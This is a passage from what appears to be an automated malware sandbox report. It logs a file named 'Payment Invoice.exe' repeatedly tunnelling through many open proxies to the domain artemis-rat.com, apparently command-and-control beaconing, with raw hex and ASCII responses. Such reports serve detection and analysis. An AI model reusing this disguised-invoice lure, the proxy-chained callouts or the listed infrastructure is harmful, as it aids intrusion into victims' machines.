2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                                                Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1836192.168.2.454633179.60.243.37486997076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.544953108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1837192.168.2.45471072.167.38.7456507076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.546188116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.714229107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:31.714612961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:37.824243069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:49.823602915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:01.823585987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:13.823618889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:37.825454950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1838192.168.2.454627103.174.102.127807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.546650887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.714379072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:31.714607000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:37.824234962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:49.823585033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:01.823601007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:13.823596954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:37.823611021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:17:25.823666096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1839192.168.2.45513268.71.254.641457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.549966097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1840192.168.2.452276132.148.16.169556107076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.554418087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1841192.168.2.45516959.6.26.121807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.570997000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1842192.168.2.45223051.15.132.215163797076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.571027040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.714396954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:31.714634895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:37.824239969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:49.823601961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:01.825330019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:13.827862978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:37.825362921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:17:25.823776960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1843192.168.2.45468349.13.163.13131287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.573198080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.714400053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:31.714607954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:37.824246883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:49.823601007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:01.825323105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:13.823632956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:37.825368881 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:17:25.823688030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1844192.168.2.45479694.131.14.6631287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.576534033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.323776007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:27.323834896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:29.323848963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:33.324265003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:37.217309952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:41.121047020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:48.823577881 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:04.323738098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1845192.168.2.45229761.129.2.21280807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.578418016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:55.916368008 CET536INHTTP/1.1 502 Bad Gateway
                                                                Server: nginx/1.20.1
                                                                Date: Mon, 11 Mar 2024 15:12:54 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Content-Length: 559
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64
                                                                Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>nginx/1.20.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padd


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1846192.168.2.452319161.97.147.19328387076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.587305069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.683275938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:31.731858015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:37.776890039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:49.777352095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:01.776947975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:13.776747942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:37.776751041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1847192.168.2.45469736.94.20.14680807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.588862896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.683039904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:31.731858015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:33.795098066 CET19INHTTP/1.1 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1848192.168.2.45235485.116.120.10636297076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.703970909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1849192.168.2.455176138.36.150.2610807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.706967115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1850192.168.2.454914165.16.31.1880807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.715092897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.841547966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:29.268893957 CET19INHTTP/1.1 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1851192.168.2.455183172.67.199.231807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.726799011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:25.880960941 CET316INHTTP/1.1 400 Bad Request
